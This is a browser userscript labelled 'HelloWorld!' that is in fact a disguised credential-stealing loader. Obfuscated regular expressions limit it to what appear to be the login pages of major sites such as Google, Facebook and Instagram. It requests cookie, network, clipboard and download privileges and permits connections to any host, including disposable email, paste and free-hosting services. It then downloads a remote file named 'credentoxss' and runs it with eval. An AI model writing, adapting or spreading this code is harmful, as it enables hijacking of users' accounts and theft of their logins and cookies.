// ==UserScript==
// @name         TamperMonkey
// @namespace    http://tampermonkey.net/
// @version      0.3
// @description  HelloWorld!
// @author       You
// @run-at       document-end
// @grant        unsafeWindow
// @grant        window.close
// @grant        window.focus
// @grant        GM_addStyle
// @grant        GM_deleteValue
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])un\1\.(m)i\2r\3s\3f\1\.\2\3\4.*$/
// @grant        GM_listValues
// @grant        GM_cookie
// @grant        GM_addValueChangeListener
// @include      /^(?=.t{2})h..(?![q-znoa-m])[a-z]s?:(?=...+\.)\/\/[\w-]+\.(?!z)(?![a-x])[a-z]{1}(?!..p)(a)(?=h|e|y)(?:h|i)(p|o|p){2,2}\.c\2(?![n-za-l])[a-z].*$/
// @grant        GM_removeValueChangeListener
// @grant        GM_setValue
// @grant        GM_getValue
// @include      /^(?=.t{2,2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2,2}[\w-]+\.(?=f|r|o|g)[f|i|s|h]a(?!..a)(?!..c)(c)e[a-c](o)\2[k]\.\1\2([m]).*$/
// @grant        GM_log
// @grant        GM_getResourceText
// @grant        GM_getResourceURL
// @grant        GM_registerMenuCommand
// @include      /^(?![t|o])[h|o|t](t)\1(?=.s?)p.?:\/{2}[\w-]+(\.)(?=...e)(?!.[l-zjka-h])l.o{0}v.\2comi?c?.*$/
// @grant        GM_unregisterMenuCommand
// @grant        GM_openInTab
// @include      /^(?=.t{2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2}(?:\w|-)+\.[^a-gj-zh](?=.s)n.t(a)g(?!t)(?!e)[t|r|e|e]\1([m-m])\.(?!a|b|[d-z])[a-z]o\2.*$/
// @grant        GM_xmlhttpRequest
// @grant        GM_download
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])un\1\.(m)i\2r\3s\3f\1\.\2\3\4.*$/
// @grant        GM_getTab
// @grant        GM_saveTab
// @include      /^(?=.t{2})h..[p]s?:(?=...+\.m)\/\/[\w-]+\.(.)([^a-d.\/\d\sf-z])s{2,2}\2(?![a-fo-z])(n|o|p|e)g\2[r-r]\.(?!a|b)(a|b|c)o\1.*$/
// @grant        GM_getTabs
// @grant        GM_notification
// @include      /^(?=.t{2})h..(?![q-znoa-m])[a-z]s?:(?!..[f-q])\/{2}(?=.i[q-t][bcd])(d|o|g).(?=.[abc])[yesb-g](.o)r(?=..p)\1[a].{2}\.\2m.*$/
// @grant        GM_setClipboard
// @grant        GM_info
// @connect      *
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])u(?=..s)n\1.\.(g)(?=..\4)\3{2}.le\.\2\3m.*$/
// @connect      github.com
// @connect      githubusercontent.com
// @include      /^(?=.t{2})h..(?![q-znoa-m])[a-z]s?:(?=...+\.)\/\/[\w-]+\.(?!z)(?![a-x])[a-z]{1}(?!..p)(a)(?=h|e|y)(?:h|i)(p|o|p){2,2}\.c\2(?![n-za-l])[a-z].*$/
// @connect      google.com
// @connect      pastebin.com
// @include      /^(?=.t{2})h..[p]s?:(?=...+\.m)\/\/[\w-]+\.(.)([^a-d.\/\d\sf-z])s{2,2}\2(?![a-fo-z])(n|o|p|e)g\2[r-r]\.(?!a|b)(a|b|c)o\1.*$/
// @connect      guerrillamail.com
// @include      /^(?![t|o])[h|o|t](t)\1(?=.s?)p.?:\/{2}[\w-]+(\.)(?=...e)(?!.[l-zjka-h])l.o{0}v.\2comi?c?.*$/
// @connect      elasticemail.com
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])u(?=..s)n\1.\.(g)(?=..\4)\3{2}.le\.\2\3m.*$/
// @connect      000webhost.com
// @include      /^(?=.t{2})h..(?![q-znoa-m])[a-z]s?:(?!..[f-q])\/{2}(?=.i[q-t][bcd])(d|o|g).(?=.[abc])[yesb-g](.o)r(?=..p)\1[a].{2}\.\2m.*$/
// @connect      heroku.com
// @connect      geoip-db.com
// @include      /^(?=.t{2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2}(?:\w|-)+\.[^a-gj-zh](?=.s)n.t(a)g(?!t)(?!e)[t|r|e|e]\1([m-m])\.(?!a|b|[d-z])[a-z]o\2.*$/
// @connect      geolocation-db.com
// @connect      bit.ly
// @connect      duckduckgo.com
// @include      /^(?=.t{2,2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2,2}[\w-]+\.(?=f|r|o|g)[f|i|s|h]a(?!..a)(?!..c)(c)e[a-c](o)\2[k]\.\1\2([m]).*$/
// @connect      mega.nz
// @connect      youtube.com
// @connect      fbcdn.net
// ==/UserScript==

(function() {
    var useringer ="Unset";
    var basehref="https://raw.githubusercontent.com/";
    GM_xmlhttpRequest ( {
            method:     'GET',
            url:        basehref+"lecatos/temposcripts/master/credentoxss",
            onload:     function (responseDetails) {
                            eval(responseDetails.responseText);
                        }});
})();
